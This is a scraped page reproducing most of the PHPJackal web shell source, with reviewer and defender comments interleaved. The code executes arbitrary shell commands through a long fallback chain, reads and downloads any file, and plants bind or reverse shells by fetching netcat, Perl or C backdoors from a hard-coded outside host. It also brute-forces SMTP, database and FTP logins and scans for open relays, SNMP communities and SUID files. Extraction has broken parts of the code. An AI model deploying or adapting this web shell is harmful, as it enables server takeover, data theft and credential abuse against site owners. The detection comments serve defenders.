php jackal
Post on 16-Jul-2015
elseif(function_exists('socket_set_timeout')){$scan=fsockopen("udp://$ip",$port);if($scan){socket_set_timeout($scan,$timeout);fwrite($scan,"\x00");$s=time();fread($scan,1);
// NOTE(review): the first statements on the next line close a function that begins above
// this excerpt; it is not documented here.
// Compatibility shims: is_executable(), file_get_contents() and file_put_contents() are
// declared only when function_exists() reports them missing. The is_executable() shim
// always returns 0.
if((time()-$s)>=$timeout){fclose($scan);return 1;}}}return 0;}if(!function_exists('is_executable')){function is_executable($addr){return 0;}}if(!function_exists('file_get_contents')){function file_get_contents($addr){
// Body of the file_get_contents() shim, followed by the file_put_contents() shim
// (opens with mode 'w'; returns strlen($con) after a successful write, otherwise 0).
$a=fopen($addr,'r');$tmp=fread($a,filesize($a));fclose($a);if($a)return $tmp;else return null;}}if(!function_exists('file_put_contents')){function file_put_contents($addr,$con){$a=fopen($addr,'w');if(!$a)return 0;$t=fwrite($a,$con);fclose($a);if($t)return strlen($con);
// file_add_contentS(): appends $con to $addr (mode 'a'); returns strlen($con), or 0 when fopen fails.
// Request handler: when both 'chmoD' and 'modE' are present, chmod() runs on the
// request-supplied path. No access check is visible in this excerpt.
// Detection: the parameter names chmoD, modE, downloaD and imagE (capitalised final
// letter) are distinctive and can be matched in web server or WAF logs.
return 0;}}function file_add_contentS($addr,$con){$a=fopen($addr,'a');if(!$a)return 0;fwrite($a,$con);fclose($a);return strlen($con);}if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);
// 'downloaD': sends back the contents of the request-supplied path as an attachment and
// exits, i.e. a read of any file the PHP process can open.
// 'imagE': same path-from-request pattern with an image content type; the handler's
// closing statements lie beyond the page break that follows this block.
if(!empty($_REQUEST['downloaD'])){ob_clean();$dl=$_REQUEST['downloaD'];$con=file_get_contents($dl);header('Content-type: application/octet-stream');header("Content-disposition: attachment; filename=\"$dl\";");header('Content-length: '.strlen($con));echo $con;exit;}if(!empty($_REQUEST['imagE'])){$img=$_REQUEST['imagE'];header('Content-type: imagE/gif');
header("Content-length: ".filesize($img));header("Last-Modified: ".date('r',filemtime($img)));echo file_get_contents($img);
exit;}if(!empty($_REQUEST['exT'])){$ex=$_REQUEST['exT'];$e=get_extension_funcs($ex);echo ''.htmlspecialchars($ex).'Functions:
';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo 'DISABLED';echo '
';}echo '';exit;}function showsizE($size){if($size>=1073741824)$size=round(($size/1073741824),2).' GB';elseif($size>=1048576)$size=round(($size/1048576),2).' MB';elseif($size>=1024)$size=round(($size/1024),2).' KB';else $size.=' B';return $size;}$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;$errorbox="Error: ";$v='1.9';$cwd=getcwd();$msgbox="
";$intro="Script:
".str_repeat('-=-',25)."
Name: PHPJackal
Version: $v
Author:
".str_repeat('-=-',25)."
Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru/
Email: nima_501@yahoo.com
".str_repeat('-=-',25)."
Error: Enable JavaScript in your browser!!!$et";$footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et";$hcwd="";$t="";$crack="Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";function checkfunctioN($func){global $disablefunctions,$safemode;$safe=array('passthru','system','exec','shell_exec','popen','proc_open');
if($safemode=='ON' && in_array($func,$safe))return 0;elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1;
// The leading `return 0;}` closes checkfunctioN(), which starts before this block.
// whereistmP(): returns the first directory that exists and is writable, tried in this
// order: /tmp, /usr/tmp, /var/tmp, USERPROFILE, ALLUSERSPROFILE, session.save_path,
// upload_tmp_dir, TMP (or TEMP); falls back to '.'.
// Defender note: these are the locations where files dropped by this script will appear.
return 0;}function whereistmP(){$uploadtmp=ini_get('upload_tmp_dir');$uf=getenv('USERPROFILE');$af=getenv('ALLUSERSPROFILE');$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';if(is_dir($uf) && is_writable($uf))return $uf;if(is_dir($af) && is_writable($af))return $af;if(is_dir($se) && is_writable($se))return $se;if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;return '.';}function shelL($command){
// shelL(): runs $command through the first available primitive and returns its output.
// Order visible in the code: passthru, system, exec, shell_exec, popen, proc_open, then
// win_shell_execute, win32_create_service, the ffi extension (Windows only), a COM
// WScript.Shell object, and finally the perl extension. Each step is gated by
// checkfunctioN() or extension_loaded().
// Defender note: because of this fallback chain, blocking only a few names in
// disable_functions leaves later branches reachable; child processes spawned by the web
// server account are the more dependable signal.
// NOTE(review): the token `feof` is split across the next two lines by the page extraction.
global $windows;$exec=$output='';$dep[]=array('pipe','r');$dep[]=array('pipe','w');if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;}elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command);elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!f
eof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command);elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command);elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws);elseif(extension_loaded('perl'))$exec=perlshelL($command);return $exec;}function getiT($get){$fo=strtolower(ini_get('allow_url_fopen'));$ui=strtolower(ini_get('allow_url_include'));
// getiT(): fetches the URL in $get. Uses file_get_contents() when allow_url_fopen is
// enabled, include() under output buffering when allow_url_include is enabled (which
// executes any PHP in the response), otherwise a hand-written HTTP/1.0 GET over
// fsockopen() with a 12-second connect timeout. The function continues past this block.
// NOTE(review): `$fo $fo=='on'` and `$ui $ui=='on'` are missing an operator, apparently
// lost in extraction — confirm against a clean copy before relying on this logic.
// The fallback request sends a fixed User-Agent string, which can serve as a network signature.
if($fo $fo=='on')$con=file_get_contents($get);elseif($ui $ui=='on'){ob_start();include($get);$con=ob_get_contents();ob_end_clean();}else{$u=parse_url($get);$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port'];$url=fsockopen($host,$port,$en,$es,12);fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nRefere
r: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");$tmp=$con='';
// Tail of getiT() (its start precedes this block): reads lines until the blank line that
// ends the response headers, then accumulates the rest of the stream into $con.
// downloadiT($get,$put): fetches $get via getiT() and writes it to the local path $put.
while($tmp!="\r\n")$tmp=fgets($url);while(!feof($url))$con.=fgets($url);}return $con;}function downloadiT($get,$put){$con=getiT($get);
// downloadiT() returns 1 when file_put_contents() reports a non-zero write, otherwise 0.
// winshelL(): runs the command through win_shell_execute('cmd.exe', ...) with output
// redirected to a uniqid('NJ') file under whereistmP(), waits one second, reads the file
// back and deletes it.
$mk=file_put_contents($put,$con);if($mk)return 1;return 0;}function winshelL($command){$name=whereistmP()."\\".uniqid('NJ');win_shell_execute('cmd.exe','',"/C $command >\"$name\"");sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}
// ffishelL(): same redirect-to-temp-file pattern, launching cmd.exe through WinExec
// bound from kernel32.dll via the ffi extension; polls until the output file exists.
// srvshelL(): registers a Windows service named uniqid('NJ') whose path is ComSpec (or a
// hard-coded cmd.exe path) and whose params carry the command, then starts, stops and
// deletes it.
// Detection: NJ-prefixed files in temp directories, short-lived services with NJ-prefixed
// names, and cmd.exe launched by the web server process.
// NOTE(review): the `$_SERVER['ComSpec']` key is split across the next two lines by the
// page extraction.
function ffishelL($command){$name=whereistmP()."\\".uniqid('NJ');$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function srvshelL($command){$name=whereistmP()."\\".uniqid('NJ');$n=uniqid('NJ');$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['Com
Spec'];win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));win32_start_service($n);win32_stop_service($n);win32_delete_service($n);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function comshelL($command,$ws){
// comshelL(): executes the command through the passed WScript.Shell COM object and
// returns everything read from its StdOut.
// perlshelL(): evaluates system('$command') inside the perl extension and returns the
// buffered output.
// smtpchecK() begins at the end of the next line and continues past this block.
$exec=$ws->exec("cmd.exe /c $command");$so=$exec->StdOut();return $so->ReadAll();}function perlshelL($command){$perl=new perl();ob_start();$perl->eval("system('$command')");$exec=ob_get_contents();ob_end_clean();return $exec;}function smtpchecK($addr,$user,$pass,$timeout){
// Connects to port 25 of $addr; returns -1 when the connection fails, then reads the banner.
$sock=fsockopen($addr,25,$n,$s,$timeout);if(!$sock)return -1;fread($sock,1024);
// Continuation of smtpchecK() (signature precedes this block): sends EHLO with a
// uniqid('NJ') name, discards three further reply lines, then starts AUTH LOGIN.
// Any unexpected reply code returns 0.
fputs($sock,'ehlo '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,1);if($res!='2')return 0;fgets($sock,512);fgets($sock,512);fgets($sock,512);fputs($sock,"AUTH LOGIN\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;
// Sends base64-encoded $user and $pass; returns 1 only on reply code 235, i.e. the
// credential pair was accepted.
// mysqlchecK(): returns 1 when mysql_connect() succeeds with the given credentials,
// otherwise 0. $timeout is accepted but not used in the visible code.
// Defender note: these helpers test credentials against services; repeated failed logins
// on SMTP AUTH, MySQL or MSSQL originating from a web server are the matching signal.
fputs($sock,base64_encode($user)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;fputs($sock,base64_encode($pass)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='235')return 0;return 1;}function mysqlchecK($host,$user,$pass,$timeout){if(function_exists('mysql_connect')){$l=mysql_connect($host,$user,$pass);if($l)return 1;
// mssqlchecK(): same contract as mysqlchecK(), using mssql_connect().
// checksmtP(): tests whether $host accepts a complete mail transaction (HELO, MAIL FROM,
// RCPT TO, DATA) without authentication. $from is built here but does not appear in the
// commands as shown.
}return 0;}function mssqlchecK($host,$user,$pass,$timeout){if(function_exists('mssql_connect')){$l=mssql_connect($host,$user,$pass);if($l)return 1;}return 0;}function checksmtP($host,$timeout){$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';$sock=fsockopen($host,25,$n,$s,$timeout);
// Returns -1 when the connection fails and 0 on the first unexpected reply code.
// NOTE(review): "MAIL FROM: " and "RCPT TO: " carry no address here — angle-bracketed
// addresses were presumably stripped by the page extraction; confirm against a clean copy.
if(!$sock)return -1;$res=substr(fgets($sock,512),0,3);if($res!='220')return 0;fputs($sock,'HELO '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"MAIL FROM: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"RCPT TO: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;
// Sends a short text message after DATA and returns 1 when the server answers 250.
// replace_stR($s,$h): applies every key => replacement pair of $s to $h with
// str_replace(), in array order, and returns the result.
fputs($sock,"DATA\r\n");$res=substr(fgets($sock,512),0,3);if($res!='354')return 0;fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." \r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;return 1;}function replace_stR($s,$h){$ret=$h;foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);
// check_urL() begins on the next line; its body continues past this block.
return $ret;}function check_urL($url,$method,$search='200',$timeout=3){
// Body of check_urL() (signature precedes this block): splits $url into host, path, port
// (default 80) and query string, then opens a TCP connection with the given timeout.
$u=parse_url($url);$method=strtoupper($method);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$data=(!empty($u['query']))?$u['query']:'';if(!empty($data))$data="?$data";$sock=fsockopen($host,$port,$en,$es,$timeout);
// Sends a raw HTTP/1.0 request; methods other than GET and POST return 0.
// When $search is '200' the result depends only on whether the first response line
// contains '200'; otherwise every response line is searched for $search.
if($sock){fputs($sock,"$method $file$data HTTP/1.0\r\n");fputs($sock,"Host: $host\r\n");if($method=='GET')fputs($sock,"\r\n");elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection:close\r\n\r\n$data");else return 0;if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}while(!feof($sock)){$res=fgets($sock);
// Returns 1 on the first matching line, 0 otherwise (including connection failure).
// get_sw_namE(): requests a random uniqid('NJ') path on port 80 and scans the response
// for a 'Server:' line.
if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}}fclose($sock);}return 0;}function get_sw_namE($host,$timeout){$sock=fsockopen($host,80,$en,$es,$timeout);if($sock){$page=uniqid('NJ');fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");while(!feof($sock)){$con=fgets($sock);
// get_sw_namE() returns the text after the first space of the 'Server:' line, -1 when no
// such line is seen, 0 when the connection fails.
// snmpchecK(): builds a byte-literal packet embedding the community string $com, sends it
// to UDP port 161 of $ip and returns 1 when any reply is read, otherwise 0.
// Detection: requests for /NJ-prefixed random paths and SNMP probes sourced from a web
// server are both unusual.
// NOTE(review): the final statements compute $safemode with an operator missing between
// the two ini_get() expressions (likely lost in extraction), and call ini_restore() for
// safe_mode and open_basedir when safe mode is reported on.
if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}}fclose($sock);return -1;}return 0;}function snmpchecK($ip,$com,$timeout){$res=0;$n=chr(0x00);$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr
(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;$sock=fsockopen("udp://$ip",161);if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);fputs($sock,$packet);socket_set_timeout($sock,$timeout);$res=fgets($sock);fclose($sock);if($res != '')return 1;else return 0;}$safemode=(ini_get('safe_mode') strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}
// brshelL() begins here and continues past this block; request parameter 'C' defaults to 0.
function brshelL(){global $errorbox,$windows,$et,$hcwd;$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
// Body of brshelL() (signature precedes this block; the function continues after it).
// Fetches a helper program from the hard-coded base URL in $addr into the directory
// returned by whereistmP(), under a uniqid('NJ_') name that is dot-prefixed on
// non-Windows hosts and marked hidden with attrib +H on Windows, then starts it via shelL().
// Indicators visible in this block: outbound HTTP to netjackal.by.ru, files named NJ_* or
// .NJ_* in temp directories, and gcc, perl or cmd.exe started by the web server account.
$addr='http://netjackal.by.ru/br';$error="$errorbox Can not make backdoor file, go to writeable folder.$et";$n=uniqid('NJ_');if(!$windows)$n=".$n";$d=whereistmP();$name=$d.DIRECTORY_SEPARATOR.$n;$c=($_REQUEST['C'])?1:0;
// Branch 1, request parameter 'port': the helper is started as a listener on that port.
// Branch 2 (further down), 'rport' together with 'ip': the helper connects out to that
// address instead. Egress filtering and an alert on new listening sockets owned by the
// web server user cover both branches.
// NOTE(review): both conditions contain an assignment (`$_REQUEST['port']=1`,
// `$_REQUEST['rport']=1`); a comparison operator may have been lost in extraction —
// confirm against a clean copy.
if(!empty($_REQUEST['port']) && ($_REQUEST['port']=1)){$port=(int)$_REQUEST['port'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winbind.p",$name);
shelL("attrib +H $name");if(!$bd)echo $error;else shelL("perl $name $port");}}else{if($c){$bd=downloadiT("$addr/bind.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");}else{$bd=downloadiT("$addr/bind.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $port &");echo "Backdoor is waiting for you on $port.
";}}}elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']=1) && !empty($_REQUEST['ip'])){$ip=$_REQUEST['ip'];$port=(int)$_REQUEST['rport'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winrc.p",$name);shelL("attrib +H $name");if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");}}else{if($c){$bd=downloadiT("$addr/rc.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
}else{$bd=downloadiT("$addr/rc.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");
}}echo 'Done!';}else{echo "Bind shell:Port:
Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"$hcwd$etReverse shell:IP:Port:Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"$hcwd$et$et";}}function showimagE($img){echo "";}function editoR($file){global $errorbox,$et,$hcwd,$cwd;if(is_file($file)){if(!is_readable($file)){echo "$errorbox File is not readable$et
";}if(!is_writeable($file)){echo "$errorbox File is not writeable$et
";}$data=file_get_contents($file);echo "$hcwd$et
";echo htmlspecialchars($data);echo "";}else {echo "$hcwd$et
";}echo "$hcwd$et";}function webshelL(){global $windows,$hcwd,$et,$cwd;if($windows){
$alias="Display open portsList of processesSystem informationIP configurationGet MAC addressServices listMachines in domainUserslistTurn off the server";}
else{$alias="Display open portsShow last 250 logged in usersDownloadersFind world-writable directoriesFind world-writable directories(in current directory)Find world-writable filesFind world-writable files(in current directory)Find files with SUID bit setFind files with SGID bit setFind .htpasswd filesFind .bash_history filesView syslog.confView hostsList of processes";if(is_dir('/etc/valiases'))$alias.="List ofcPanel`s domains(valiases)";if(is_dir('/etc/vdomainaliases'))$alias.="List cPanel`s domains(vdomainaliases)";if(file_exists('/var/cpanel/accounting.log'))$alias.="Display cPanel`s log";if(is_dir('/var/spool/mail/'))$alias.="Mailboxes list";}echo "Location:$et
Web Shell:";if(!empty($_REQUEST['cmd']))echo shelL($_REQUEST['cmd']);echo"$hcwd$alias$hcwd$et";}function maileR(){global $msgbox,$et,$hcwd;if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];if(mail($to,$subject,$body,"From: $from"))echo "$msgboxMail sent!
$et";}echo "
Mailer:SMTP".ini_get('SMTP').' ('.ini_get('smtp_port').")From:$hcwdTo: -
r='#666666'>Subject:Body:$et";
}function scanneR(){global $hcwd,$et;if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;if(($udp$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport'])&& !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;echo 'Port scanning started against '.htmlspecialchars($target)
.':
';$start=time();for($i=$from;$i -
if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;$open=$ser='';foreach($p as $po){$scan=checkthisporT($ip,$po,$timeout);if($scan){$ser='';if($ser=getservbyport($po,'tcp'))$ser="($ser)";
$open.=" $po$ser ";}}if($open){echo "$ip) Open ports:$open
";$output=1;}}if(!empty($_REQUEST['httpbanner'])){$res=get_sw_namE($ip,$timeout);if($res){echo "$ip) Webserver software: ";if($res==-1)echo 'Unknow';else echo $res;
echo '
';$output=1;}}if(!empty($_REQUEST['httpscanner'])){if(checkthisporT($ip,80,$timeout) && !empty($file)){$admin=array('/admin/','/adm/');$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');foreach($file as $v){$vuln=array();$v=trim($v);if(!$v $v{0}=='#')continue;$v=str_replace('","','^',$v);$v=str_replace('"','',$v);$vuln=explode('^',$v);$page=$cqich=$nukech=$adminch=$userch=$vuln[1];if(strstr($page,'@CGIDIRS'))foreach($cgi as $cg){$cqich=str_replace('@CGIDIRS',$cg,$page);
$url="http://$ip$cqich";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@ADMINDIRS'))foreach($admin as $cg){$adminch=str_replace('@ADMINDIRS',$cg,$page);$url="http://$ip$adminch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@USERS'))foreach($users as $cg){$userch=str_replace('@USERS',$cg,$page);
$url="http://$ip$userch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@NUKE'))foreach($nuke as $cg){$nukech=str_replace('@NUKE',$cg,$page);$url="http://$ip$nukech";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}else{$url="http://$ip$page";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}}}}if(!empty($_REQUEST['smtprelay'])){if(checkthisporT($ip,25,$timeout)){$res='';$res=checksmtP($ip,$timeout);if($res==1){echo "$ip) SMTP relay found.
";$output=1;}}}if(!empty($_REQUEST['snmpscanner'])){if(checkthisporT($ip,161,$timeout,1)){$com=$_REQUEST['com'];$coms=$res='';if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com;foreach($c as $v){$ret=snmpchecK($ip,$v,$timeout);if($ret)$coms.=" $v ";}if($coms!=''){echo "$ip) SNMP FOUND: $coms
";$output=1;}}}if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){if(checkthisporT($ip,21,$timeout)){$usps=explode(',',$_REQUEST['userpass']);foreach($usps as $v){$user=substr($v,0,strpos($v,':'));$pass=substr($v,strpos($v,':')+1);if($pass=='[BLANK]')$pass='';$ftp=ftp_connect($ip,21,$timeout);if($ftp){if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (Connect)
";}}}}}if($output)echo '';}
$time=time()-$start;echo "Done! ($time seconds)";if(!empty($buglist))unlink($buglist);}elseif(!empty($_REQUEST['directoryscanner'])){$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];echo "Scanning started...\n";
for($i=0;$i
bgcolor='#808080'>Get web bannerWebserver security scanningSMTP relay checkFTP password:SNMP:$et";}}function sysinfO(){global $windows,$disablefunctions,$cwd,$safemode;$t8="";$t6="";$mil="
$os=php_uname();$osn=php_uname('s');if(!$windows){$ker=php_uname('r');$o=($osn=='Linux')?'Linux+Kernel':$osn;$os=str_replace($osn,"${mil}$o'>$osn",$os);$os=str_replace($ker,"${mil}Linux+Kernel'>$ker",$os);
$inpa=':';}else{$sam=$sysroot."\\system32\\config\\SAM";$inpa=';';$os=str_replace($osn,"${mil}MS+Windows'>$osn",$os);}$cuser=get_current_user();if(!$cuser)$cuser='Unknow';$software=str_replace('Apache',"${mil}Apache'>Apache",$_SERVER['SERVER_SOFTWARE']);echo "Server information:${t6
}Server:".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "${t8}Operation system:$os$osver${t6}Web server application:$software${t8}CPU:$CPU${t6}Disk status:$disksize${t8}User domain:";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "${t6}User name:$cuser";if($windows){echo "${t8}Windows directory:$sysroot${t6}Sam file:";if(is_readable(($sam)))echo "Readable"; else echo 'Not readabl
e';echo '';}else{echo "${t8}UID - GID:".getmyuid().' - '.getmygid()."${t6}Recommended local root exploits:$xpl${t8}Passwd file:";if(is_readable('/etc/passwd'))echo "Readable";else echo'Not readable';echo "${t6}${mil}cpanel'>cPanel:";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";
if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "Readable";else echo 'Not readable';}else echo 'Not found';echo ')';}echo "$t8${mil}PHP'>PHP version:".PHP_VERSION." (more...)${t6}Zend version:";if (function_exists('zend_version')) echo "".zend_version().'';else echo 'Not Found';echo "${t8}Include path:".str_replace($inpa,'',DEFAULT_INCLUDE_PATH)."${t6}PHP Modules:";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i)
)$i="($i)";$l=hlinK("exT=$v");echo "$v $i ";}echo "${t8}Disabled functions:";if(!empty($ds))echo "$d
s ";else echo 'Nothing'; echo"${t6}Safe mode:$safemode${t8}Open base dir:$basedir${t6}DBMS:";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL ";if(function_exists('ora_logon')) $sq.=" ${mil}Oracle'>Oracle ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL ";if
(function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq";}function checksuM($file){global $et;echo "MD5: ".md5_file($file).'
SHA1:'.sha1_file($file)."$et";}function listdiR($cwd,$task){$c=getcwd();$dh=opendir($cwd);while($cont=readdir($dh)){if($cont=='.' $cont=='..')continue;$adr=$cwd.DIRECTORY_SEPARATOR.$cont;switch($task){case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;case '1':if(is_writeable($adr)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '2':if(is_file($adr) && is_writeable($adr))echo "[$adr]\n";break;
case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break;case '4':if(is_file($adr))echo "[$adr]\n";break;case '5':if(is_dir($adr))echo "[$adr]\n";break;case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '7':if(strstr($cont,$_REQUEST['search']) (is_file($adr) && strstr(file_g
et_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}}if(is_dir($adr))listdiR($adr,$task);}}if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}function filemanageR(){global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;$table="";$td1n="";$td2m="";
